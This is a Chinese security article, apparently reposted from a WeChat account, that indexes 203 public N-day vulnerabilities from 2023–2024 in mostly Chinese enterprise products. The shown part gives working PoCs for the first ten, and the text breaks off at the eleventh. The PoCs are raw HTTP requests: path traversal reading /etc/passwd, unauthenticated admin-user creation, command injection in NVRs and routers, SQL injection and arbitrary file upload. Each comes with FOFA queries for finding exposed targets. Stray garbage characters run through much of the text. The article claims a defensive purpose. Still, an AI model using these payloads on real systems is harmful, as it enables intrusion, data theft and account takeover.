互联网公开漏洞整理202309-202406
+ a7 S* S! y6 ^" g9 u8 I道一安全 2024-06-05 07:41 北京6 s0 D A- I) U7 b& s: l
以下文章来源于网络安全新视界 ,作者网络安全新视界
/ Y* j2 P' G' U; W6 R# S4 o; [
$ [ ]/ i( J( J# g) A发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
9 H; ?7 I6 x1 ?4 ?. M
* ~# n0 ?' b Y. c* |% L漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
0 l: T7 ?) M W, }5 x2 @7 N
5 o1 \2 K. J# R安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。0 M6 s0 R! `( z) g* ^# H
( v' B5 A, V! e3 a/ G- h( \2 v
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
' y) e2 k) K& G! b* M0 y+ N
( ]. n% f4 D2 z6 \' n合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
) A( q# S0 e6 A% ?7 W k- P) Z) ?) I2 t2 u% Z
, E/ _9 u A2 ^9 C
声明! @3 a& U4 N: D W; \* C( i
& ]4 N* Z% H0 T, P9 i
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。$ m+ R& x3 M" q( h
( T# J! s4 y( \, O8 [' A
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。/ q o* @9 E4 h y% W
+ Z1 K% m9 A1 y) |0 h% X2 T2 p
; _& Z7 }' X: k) c( f, {3 p; L+ f' {4 V6 R, c0 z
目录0 P* q+ r8 h' o- ]; h t
" I! C" u8 P8 N0 b! x/ |8 u
01
' ] s. A; K C. K8 ~
+ h' K+ c6 q# I" R) c1. StarRocks MPP数据库未授权访问0 R1 f8 y! H% X/ Y6 X) ?( Q
2. Casdoor系统static任意文件读取
) K) c' Z8 p/ X: J0 Q3. EasyCVR智能边缘网关 userlist 信息泄漏0 e* A& y/ O9 I. @, E: y
4. EasyCVR视频管理平台存在任意用户添加0 F- l. Q6 [; p( ?
5. NUUO NVR 视频存储管理设备远程命令执行7 w1 y9 v! Y# k8 j
6. 深信服 NGAF 任意文件读取
$ z: U: d% w( G- g7. 鸿运主动安全监控云平台任意文件下载( H- u4 D& @1 d! [8 }
8. 斐讯 Phicomm 路由器RCE9 H0 l; o7 P: ~/ C% x( h
9. 稻壳CMS keyword 未授权SQL注入
7 \! O! `- q. b& C2 ]# V10. 蓝凌EIS智慧协同平台api.aspx任意文件上传6 u3 e; M) L9 E* |: j! M
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
4 U; m; P1 X: x, n, }& {12. Jorani < 1.0.2 远程命令执行
/ H" V d' l+ A/ O* v: B: x13. 红帆iOffice ioFileDown任意文件读取* a! h2 W& C7 R
14. 华夏ERP(jshERP)敏感信息泄露
g) G4 n! _) r5 Z15. 华夏ERP getAllList信息泄露
9 k' T$ `' y% X4 B( J16. 红帆HFOffice医微云SQL注入0 K G. g4 w( J5 x# }1 ^, |
17. 大华 DSS itcBulletin SQL 注入
3 Y- p% w/ _5 h4 |18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
/ F2 J# u2 c7 }19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
& i2 l: E- o$ @# e3 Q8 t- F20. 大华ICC智能物联综合管理平台任意文件读取7 ]) C: q* h4 d+ O% j3 t% x- j+ j
21. 大华ICC智能物联综合管理平台random远程代码执行" U7 c F f% H @- [2 t
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
3 Z( W; _- s8 R7 ^1 r# ?, Q4 {23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
v& M% K7 J. @1 X! x# U24. 用友NC 6.5 accept.jsp任意文件上传/ ~) t9 }) a5 ~) ?0 k
25. 用友NC registerServlet JNDI 远程代码执行5 O4 E- C8 ]7 \- J# i7 {1 P8 g5 M" Z
26. 用友NC linkVoucher SQL注入7 N, I% J; s& l1 h) ^8 B; E4 X8 U
27. 用友 NC showcontent SQL注入
* C H) v7 s0 `& G Q+ @7 Z; y28. 用友NC grouptemplet 任意文件上传
& Z) E% c+ G) D29. 用友NC down/bill SQL注入) O/ P8 Q( [ K {; Z/ w; F
30. 用友NC importPml SQL注入
$ y. C5 u) X' l31. 用友NC runStateServlet SQL注入
# J- N4 \$ ` U, g. G4 q9 c32. 用友NC complainbilldetail SQL注入
7 z6 z; U' i- N! J) {33. 用友NC downTax/download SQL注入9 }. T4 @, w/ F$ w3 v; q+ r @4 i
34. 用友NC warningDetailInfo接口SQL注入
3 Y& l2 F; X4 I7 @2 ~( u+ q& X35. 用友NC-Cloud importhttpscer任意文件上传
6 o8 P0 a- ?- q# V36. 用友NC-Cloud soapFormat XXE3 R7 f) R: d/ O. `3 z# r, l0 k- O
37. 用友NC-Cloud IUpdateService XXE8 k- E: {; f, x3 h
38. 用友U8 Cloud smartweb2.RPC.d XXE6 C) E0 u3 F: U _. ^/ E+ e
39. 用友U8 Cloud RegisterServlet SQL注入4 E( f* ?- e3 i5 v
40. 用友U8-Cloud XChangeServlet XXE
" ?- }* v1 h+ a4 ^" Y: u41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
8 L" p- P% o8 I42. 用友GRP-U8 SmartUpload01 文件上传( d; I# {3 i: \* G: P& ^+ `
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
3 W, ]7 s* t1 T44. 用友GRP-U8 bx_dj_check.jsp SQL注入
$ g% H, t% D- [; N45. 用友GRP-U8 ufgovbank XXE
- Q L o d9 A9 x46. 用友GRP-U8 sqcxIndex.jsp SQL注入0 k0 _0 ]2 v4 s8 ^! g
47. 用友GRP A++Cloud 政府财务云 任意文件读取
- p6 b" }( A0 F9 \( F7 \48. 用友U8 CRM swfupload 任意文件上传( Q. y' a5 k! n) {
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
9 Z+ u% G- ~5 f8 p6 V. n9 G50. QDocs Smart School 6.4.1 filterRecords SQL注入
7 P. y o* U c' q+ v51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入! @- @, R( @$ ?3 R
52. 泛微E-Office json_common.php sql注入
$ \' _9 m) K/ m53. 迪普 DPTech VPN Service 任意文件上传# g* m! N3 z3 V* g
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
8 H% P$ A. ]+ c1 B6 B" o55. 畅捷通T+ getdecallusers信息泄露8 B4 y$ \6 Q" g+ U
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
% b8 i' r. b1 t57. 畅捷通T+ keyEdit.aspx SQL注入
" _* k. W. s$ O; @- E7 g58. 畅捷通T+ KeyInfoList.aspx sql注入" J* g3 s/ c6 U- C
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
; C% L1 Q( [& ~60. 百卓Smart管理平台 importexport.php SQL注入
" ~- ]8 b# N' N2 g: Q1 l; z/ }6 Q61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
" n& U( ^8 F. {62. IP-guard WebServer 远程命令执行
: {) i+ B' k* A9 e# p4 o+ l63. IP-guard WebServer任意文件读取
' w. N) Z) P6 c6 w0 X64. 捷诚管理信息系统CWSFinanceCommon SQL注入; ^+ D9 P1 `* u/ B7 |2 L
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过7 V4 ?2 q7 V, b: }
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
/ ^2 O4 x* |3 G2 K8 R3 _; m67. 万户ezOFFICE wpsservlet任意文件上传
1 g" ~0 t) r0 Y9 f3 H68. 万户ezOFFICE wf_printnum.jsp SQL注入 Y- e5 d& h1 T( r, z
69. 万户 ezOFFICE contract_gd.jsp SQL注入9 y" X3 Z. B* y4 X; w) H; S
70. 万户ezEIP success 命令执行- O* ^& v9 W) _/ s+ v9 K
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入( {% n+ Z# J/ Q
72. 致远OA getAjaxDataServlet XXE
8 e, r$ b; L, B$ w. ^$ k3 L/ @73. GeoServer wms远程代码执行
! g# ~" q* s6 Z( Y" k74. 致远M3-server 6_1sp1 反序列化RCE/ T; O* V& D3 ] n* l
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE& R3 A& o/ E$ e# j# M
76. 新开普掌上校园服务管理平台service.action远程命令执行
S% L! |4 ~4 |* ^9 {0 i77. F22服装管理软件系统UploadHandler.ashx任意文件上传
5 L$ ]5 O8 t. k- j- b, h78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
2 ?0 N) U2 t1 O79. BYTEVALUE 百为流控路由器远程命令执行5 ~0 a. \0 j. Q
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
w/ Y& q; O$ n. W81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- F* M" C5 p% x82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
; x" w5 E1 H. u+ q4 i83. JeecgBoot testConnection 远程命令执行1 M# c( S; E) v5 O4 i* s V
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
+ t0 L% o" u7 t5 u85. SysAid On-premise< 23.3.36远程代码执行4 o: V* S: W7 E' K) G& \
86. 日本tosei自助洗衣机RCE
9 i% Y) z& R( U/ f" s! L2 q87. 安恒明御安全网关aaa_local_web_preview文件上传" H: T, O. `% |5 Y, J/ I8 }3 t
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行3 N% A! j' ^3 l% ~9 R
89. 致远互联FE协作办公平台editflow_manager存在sql注入
4 l0 ~( ]* x/ R+ H+ k D9 Z90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行6 R, z9 t5 y+ y: k& l+ N) c
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取7 m4 u: u. D" y# z u
92. 海康威视运行管理中心session命令执行
% y a9 K2 q, R2 {93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传" P4 j: f5 U3 o0 T8 y4 D
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
# N& }2 L0 m) n95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行# D( b( G5 q* Z( J6 [& d' c
96. Apache OFBiz 18.12.11 groovy 远程代码执行. }/ F- p# Z4 P' f4 r) D
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
3 `7 S/ j7 a: E# h8 I+ ?9 t98. SpiderFlow爬虫平台远程命令执行/ T! a" c5 p6 i" V- ]* }
99. Ncast盈可视高清智能录播系统busiFacade RCE* f. \$ M1 a2 D- P3 i7 P- z, ]
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
4 v% L& @# g! _; w101. ivanti policy secure-22.6命令注入
: T$ m5 @1 Y2 H: _% a+ ^6 K102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
2 W& q! u% u8 H8 ?6 Y. y103. Ivanti Pulse Connect Secure VPN XXE
1 z( q/ }3 [; r( ^7 c) ^: U. P104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露2 G- ~( I! J' z+ I
105. SpringBlade v3.2.0 export-user SQL 注入, t+ c2 D9 P3 q: {' }& ^
106. SpringBlade dict-biz/list SQL 注入
9 i' I5 P( W. A/ E6 w* T$ h" {9 D: `107. SpringBlade tenant/list SQL 注入
. z2 o9 f- l/ n1 L* @108. D-Tale 3.9.0 SSRF6 S! `" Q* Q& v" A) ^2 Z% @7 X, s( I/ W
109. Jenkins CLI 任意文件读取
V9 ~$ I9 p! |1 v7 u110. Goanywhere MFT 未授权创建管理员& d& A/ _+ |, o" A4 k# E# q
111. WordPress Plugin HTML5 Video Player SQL注入
6 g1 p0 P& [& O4 k+ d112. WordPress Plugin NotificationX SQL 注入3 y, D) o! f1 Q, I
113. WordPress Automatic 插件任意文件下载和SSRF
! ]4 i2 j# m+ A5 r/ ~0 H114. WordPress MasterStudy LMS插件 SQL注入
: q5 `9 e* `. V' U, R115. WordPress Bricks Builder <= 1.9.6 RCE* o+ f3 G9 S& R C' H0 Z8 s7 S
116. wordpress js-support-ticket文件上传
9 {0 j! T& {+ R# M$ `, Y& c117. WordPress LayerSlider插件SQL注入
8 C( e5 R* i* Q u( w118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
( @9 Q6 r w. s7 f119. 北京百绰智能S20后台sysmanageajax.php sql注入! F+ {# C6 S. a/ ] C' P3 I% a
120. 北京百绰智能S40管理平台导入web.php任意文件上传$ ]4 I5 e5 r" a2 |/ b* D
121. 北京百绰智能S42管理平台userattestation.php任意文件上传& f/ z! V; f# ~, F# z
122. 北京百绰智能s200管理平台/importexport.php sql注入+ C' w2 a, C J) [4 p9 Y! p
123. Atlassian Confluence 模板注入代码执行8 k% _9 r. K- n; \3 ] b$ ~
124. 湖南建研工程质量检测系统任意文件上传% B+ e8 d2 `) H7 U
125. ConnectWise ScreenConnect身份验证绕过 T/ ]( h! G! O# j
126. Aiohttp 路径遍历
! ]; ^" i* W( c8 C$ l; k; x: G% j/ u127. 广联达Linkworks DataExchange.ashx XXE# r& Z1 f' a* C5 q1 g
128. Adobe ColdFusion 反序列化
( p1 y5 {& V; [129. Adobe ColdFusion 任意文件读取
, G& i% e, f0 w% X \130. Laykefu客服系统任意文件上传+ k' e; h1 j- h; L. i9 D3 O
131. Mini-Tmall <=20231017 SQL注入# K, ?5 [; q$ ^' g: {! G
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过" S$ L1 Q$ u! b8 O, C% ]
133. H5 云商城 file.php 文件上传5 H3 R+ D8 j5 Z6 J: U
134. 网康NS-ASG应用安全网关index.php sql注入* [/ t! @6 `& b: @1 u! E' z4 Q3 R- Q
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入" _" i1 r8 {7 ?
136. NextChat cors SSRF/ I4 f+ s% i3 C$ L: u; U
137. 福建科立迅通信指挥调度平台down_file.php sql注入9 i! A# m0 P9 _& p! R8 A7 A4 `
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入+ J5 L$ v N" g% G4 X
139. 福建科立讯通信指挥调度平台editemedia.php sql注入" u. R0 G( X. e9 Y
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入# y* s4 {- Y& e
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
, l9 @4 G, W* o, C142. CMSV6车辆监控平台系统中存在弱密码4 q! ?8 L8 r# v% A- G8 M0 m/ V9 U" [
143. Netis WF2780 v2.1.40144 远程命令执行
- L; E$ N7 S3 Z144. D-Link nas_sharing.cgi 命令注入
& c, ~8 B) i2 b/ K( u- u5 C145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
8 O( i) h% N- J8 ?9 D% M h$ \8 X146. MajorDoMo thumb.php 未授权远程代码执行
9 @' q$ x d1 j! g- U# I147. RaidenMAILD邮件服务器v.4.9.4-路径遍历# I9 j: Z8 h3 ]5 N8 H9 Y& S
148. CrushFTP 认证绕过模板注入
. ~ }5 U$ {% h% u& Z; R' R+ R149. AJ-Report开源数据大屏存在远程命令执行( r# `( |# q* f! b2 x* B7 P
150. AJ-Report 1.4.0 认证绕过与远程代码执行
V' ~4 |$ c6 U. P! u; d151. AJ-Report 1.4.1 pageList sql注入; I* x+ @/ P. J3 m7 R; U
152. Progress Kemp LoadMaster 远程命令执行
- H8 U9 b' _ s$ S: }153. gradio任意文件读取6 D2 B/ i2 _$ d
154. 天维尔消防救援作战调度平台 SQL注入
, k$ }0 P$ Y9 I4 a155. 六零导航页 file.php 任意文件上传
" t3 E) h( P9 J156. TBK DVR-4104/DVR-4216 操作系统命令注入* `8 S/ m# [8 m; r
157. 美特CRM upload.jsp 任意文件上传
' x, d- C& S8 l1 d8 A- q. C158. Mura-CMS-processAsyncObject存在SQL注入
' Z" H% G8 G+ P: V159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传7 a5 n0 }$ ]# x; X! R8 C
160. Sonatype Nexus Repository 3目录遍历与文件读取
5 C7 ^0 I5 Q4 B p161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ C B+ F5 d6 H8 M T
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传$ S T+ Y6 E1 F1 O2 R+ _8 B( Y
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
9 C; Y, A& s: B3 o) k( W164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传- b" O0 `6 g4 R3 y
165. OrangeHRM 3.3.3 SQL 注入9 i$ u9 d$ Y: u) o7 {2 C
166. 中成科信票务管理平台SeatMapHandler SQL注入
5 M) h5 W+ G5 k1 K7 q% X& S7 \167. 精益价值管理系统 DownLoad.aspx任意文件读取) S% F: U! a( m* G& _0 n' ~
168. 宏景EHR OutputCode 任意文件读取
2 D* v$ J$ h$ N- W5 R+ u t169. 宏景EHR downlawbase SQL注入& e1 y4 V/ N. M4 p
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
% K5 \ P7 \+ Z4 [# U1 A" V171. 通天星CMSV6车载定位监控平台 SQL注入
8 d$ x- e; N, I6 J172. DT-高清车牌识别摄像机任意文件读取1 W4 Z1 F- Y. J0 w
173. Check Point 安全网关任意文件读取
* ? T% B5 h2 Q4 F" |1 n174. 金和OA C6 FileDownLoad.aspx 任意文件读取5 h2 Q5 @3 ?* ~& ], j$ v
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
9 [; x; d2 n" Z$ _* e. T176. 电信网关配置管理系统 rewrite.php 文件上传2 Z9 |3 j' g* x4 K$ c a# U% ^
177. H3C路由器敏感信息泄露+ x; O$ D$ @6 F% A- N
178. H3C校园网自助服务系统-flexfileupload-任意文件上传' b3 q* z" ], P% u# I I5 D ^. P+ V
179. 建文工程管理系统存在任意文件读取0 h" X) F! f3 L
180. 帮管客 CRM jiliyu SQL注入
: [: K9 W0 c6 Z/ F3 Y181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入+ ` t% r- y% F& N ]2 l9 e) Q
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建3 K5 d1 h" E2 v; l+ G4 k
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
# r. _- y7 F* [; h0 c$ T6 _9 P184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加0 q- J8 ]3 j, l( S( J7 P( `
185. 瑞友天翼应用虚拟化系统SQL注入
3 N1 v9 ~; T; W5 c9 ?186. F-logic DataCube3 SQL注入
: _! C$ @% Q0 k8 ~; |& c1 R187. Mura CMS processAsyncObject SQL注入4 T T' u9 Y- }- {) g) u/ F& X. x
188. 叁体-佳会视频会议 attachment 任意文件读取4 ~- ~5 X' y! C8 l
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
& w3 X( R" D6 H/ j& ]) v- l$ @190. 短视频矩阵营销系统 poihuoqu 任意文件读取
# Q) b! e7 e( x+ l) i4 ]3 ^191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
* X' W2 B r. j0 s- h4 l$ }1 C192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
3 w! j8 \; h* V193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行& |4 J/ l0 k0 {! D" Q
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
% }( u; u( G/ V3 r% I195. 飞鱼星上网行为管理系统 send_order.cgi命令执行* w; k/ v& {6 U- \: x3 ^
196. 河南省风速科技统一认证平台密码重置
! y' l) v" G7 N% T$ I8 ~+ k197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# W. A+ h& G, {% r* ~198. 阿里云盘 WebDAV 命令注入! ?9 J# L& u9 { j1 [: g
199. cockpit系统assetsmanager_upload接口 文件上传7 |) G2 m% _3 D) }* J4 |
200. SeaCMS海洋影视管理系统dmku SQL注入4 @- `0 a7 r( ~, D* Q
201. 方正全媒体新闻采编系统 binary SQL注入" m$ l/ X, E1 X* N' [5 A0 V
202. 微擎系统 AccountEdit任意文件上传) l) Q+ M5 X g+ N
203. 红海云EHR PtFjk 文件上传
3 h$ Z. }8 U. C0 Y( v1 G( h/ `
4 n# y# x% J' p7 N/ C7 g! K9 yPOC列表
3 @# H: ]* ~4 V! n! f
9 C+ `# D- t5 d H& b02
/ A! E/ L9 a1 o
4 d$ G8 {% l: J( k1. StarRocks MPP数据库未授权访问( M. x- P: T& c8 R5 S4 O
FOFA :title="StarRocks"- a) l( H: I$ N5 q
GET /mem_tracker HTTP/1.1
& Q$ W8 U8 f& i* jHost: URL- Z6 X' e6 b J% T1 T3 A. `
, }- n* e+ W. J9 V& M$ I7 S) A
! S( a$ ~9 M9 [( a) P, x2. Casdoor系统static任意文件读取5 E$ P, `9 y' N ~: t
FOFA :title="Casdoor"
/ F; w3 q4 a3 S! w$ Z1 `GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
' M& N: H# |; o8 ]; LHost: xx.xx.xx.xx:9999* ~: y! O; H' M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
3 m$ Y; p, i- {. p% S0 sConnection: close; ~+ G( c! } c5 T) A& o
Accept: */*
2 Z1 T) t f5 q2 G& Z2 S, OAccept-Language: en y' x& j' a6 y. ~: Y* c
Accept-Encoding: gzip, i& B/ x: @7 ` u1 Y: Y; d
( A- _+ l0 ?3 z+ W* _
3 H4 Z/ d+ o; n! S$ u/ e3. EasyCVR智能边缘网关 userlist 信息泄漏
8 @% z, U) M6 M+ Z D UFOFA :title="EasyCVR"6 D5 `" P& ^; w& D* `8 |9 G0 c& o, H: X& x
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
7 @0 b v8 ?/ V, R! c6 q) I2 f+ ]& zHost: xx.xx.xx.xx# A' D2 _+ y+ p0 z
8 U: p3 U5 z( Y1 d8 [0 v2 j: ]/ h0 J4 ^9 e3 ^, A
4. EasyCVR视频管理平台存在任意用户添加# s/ c/ [/ g4 ~2 L8 Q t5 s
FOFA :title="EasyCVR"; O7 o0 q3 D* ]* y& r, ?
# A# {( n4 m) u; k
password更改为自己的密码md5
1 u ]9 ^2 q, c: g5 \" P- C3 uPOST /api/v1/adduser HTTP/1.1/ T1 N! S3 A6 a% J6 R4 |
Host: your-ip! d7 D% m" i! V# x* ?! j$ M
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
/ d- T; [, j' R; k$ N, ]% N; x3 z& {0 Y% H h; m2 z( Y; F; q
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
# P0 ~0 J2 L8 P8 B( F; e6 A. c3 T- j, O) ?7 i% n7 @
2 U$ ?# l8 h" w7 Z6 s5. NUUO NVR 视频存储管理设备远程命令执行
7 K# Q7 N# Z9 H" r O) uFOFA:title="Network Video Recorder Login"/ z# p+ s, C4 }- s
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1; ~- {; d. X( z9 w/ d
Host: xx.xx.xx.xx; w* I; H b! g `1 v
9 P* h/ m8 f, [) s5 G- g' f/ D
6 K) }3 k% |) Y, j
6. 深信服 NGAF 任意文件读取6 ~) D# s B* Y' X
FOFA:title="SANGFOR | NGAF"
9 \% S7 w4 y" A5 t \GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.12 S! m$ U0 C& s1 o/ Q
Host:
- o, D- [; E; E5 D* q/ Z M* o$ }7 u* G H: Z
0 n# z3 U$ x8 {3 k
7. 鸿运主动安全监控云平台任意文件下载
" L5 p8 j& U$ x9 h5 g zFOFA:body="./open/webApi.html"
* X. Y. p+ C$ K3 ~- y" f- x. f# |GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
$ s* A0 r6 H' ?- P b$ b2 h: `Host:
4 W4 R$ J; r. y/ V6 N# [
7 H7 y% N# S* v) f6 Q" _
' R, A: \& B2 `& g3 j; g: V8. 斐讯 Phicomm 路由器RCE8 y4 i0 g/ } v# N) p9 b4 C8 q
FOFA:icon_hash="-1344736688"
0 q1 [7 w; d0 A9 g3 K默认账号admin登录后台后,执行操作
7 g0 ]8 b b9 P/ |POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1 @7 j8 E4 i8 V1 P7 R
Host: x.x.x.x$ o0 n, @3 {! E1 U5 L( q3 H# m' U, c9 G' E
Cookie: sysauth=第一步登录获取的cookie
2 c- {2 `9 j& k1 ~8 x4 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
9 q, o/ m: p" {' D3 bUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
+ }3 [2 @1 Y% K/ _1 M2 @3 h" J- D# B# R' c
------WebKitFormBoundaryxbgjoytz
7 [, j! n3 T3 o5 A. c6 MContent-Disposition: form-data; name="wifiRebootEnablestatus"
( n) L1 A2 W" r5 ?8 q3 V3 B2 A0 i9 D
%s' h0 \) w/ f4 }- G* z2 T- v: T/ L4 ~: m
------WebKitFormBoundaryxbgjoytz$ M3 {* v, _ Z: |0 x5 k
Content-Disposition: form-data; name="wifiRebootrange"/ h* {$ ?9 r* X$ Z0 k d- F
9 H4 Q* e2 ?! m* Y7 k: f. X ?1 b$ C
12:00; id;
8 S$ J0 A# o* N$ H------WebKitFormBoundaryxbgjoytz
8 P; g: n/ c1 r- t( P9 KContent-Disposition: form-data; name="wifiRebootendrange"
4 ]7 n6 O$ A' U- R0 s
6 X; t* k& ^; I. s+ D& M+ j%s:! I9 ]/ f# d9 x7 \* J! b
------WebKitFormBoundaryxbgjoytz" h; S/ q# `- s a' ]
Content-Disposition: form-data; name="cururl2"
" U# r: _* v, {+ x) v* J0 s$ u( [- X$ ~0 Z# L( U0 R/ B
# U# V. h4 g& q------WebKitFormBoundaryxbgjoytz--4 _2 W5 ^4 Q! D; d' @7 n
- N; K2 A$ m i* ?0 |
- T/ ^! D5 z, K) M5 O% \5 ]6 f5 Z
9. 稻壳CMS keyword 未授权SQL注入- a) ~8 O9 C9 V8 Y
FOFA:app="Doccms"
- L: j+ t9 y: B' SGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
/ K0 G! g/ Q/ D% l6 A; b2 w0 G4 CHost: x.x.x.x
4 a4 G1 K+ z- j6 o/ H' f* Q
5 p+ u2 ^1 d' Z0 m( _% o! Q1 `; m: F- ~% a
payload为下列语句的二次Url编码
( m, G2 g1 P( B: a: ]
- `& ?% R D; ?8 t' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#0 p9 c) @! P* V# Y! _: }8 l1 ~2 m
: R& c) W& f( k6 n! V
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
0 ]5 i' U+ x. q1 @' T) o. v$ h9 ^FOFA:icon_hash="953405444"
; Q5 T7 {" Z4 `* Z6 X7 q L; e/ r4 H( a3 W5 `, T: w5 e+ h) G% b( ?
文件上传后响应中包含上传文件的路径: V/ x6 s' `1 e8 }0 C7 z# G
POST /eis/service/api.aspx?action=saveImg HTTP/1.1' a8 |+ k9 F4 k* O5 O* z
Host: x.x.x.x:xx
7 S. B1 A+ K. S9 |+ t: x6 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; N6 n: x! U# M/ a6 n8 s
Content-Length: 1976 F& [1 P1 y; K. r9 U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9$ ~+ t+ {: U' J0 k8 {' K
Accept-Encoding: gzip, deflate$ f9 K1 x) W+ _' g
Accept-Language: zh-CN,zh;q=0.9
% `. n" N. }2 g* ]Connection: close Q1 X- A9 G3 }1 D3 s
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu3 c a2 P* ?2 P% I
4 e- q1 F, M/ p2 \------WebKitFormBoundaryxdgaqmqu
, Q: V! d3 d! z' f& P( jContent-Disposition: form-data; name="file"filename="icfitnya.txt"
8 m/ |8 d: p6 k+ CContent-Type: text/html9 ] k4 i; {8 z
* \8 n# n1 c4 C+ V( D3 X! C% N7 i
jmnqjfdsupxgfidopeixbgsxbf
6 W7 n& A% ?) D3 S) C( E------WebKitFormBoundaryxdgaqmqu--! M6 w9 ~8 O+ [# Q4 _9 F" @/ E
6 C. f! F+ e8 j6 N, i) Y
3 d2 g0 \1 y0 J11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入9 O+ y" b% \- f Y9 a! w7 a
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"( ~; V$ L, k$ j+ ~8 T' d) X
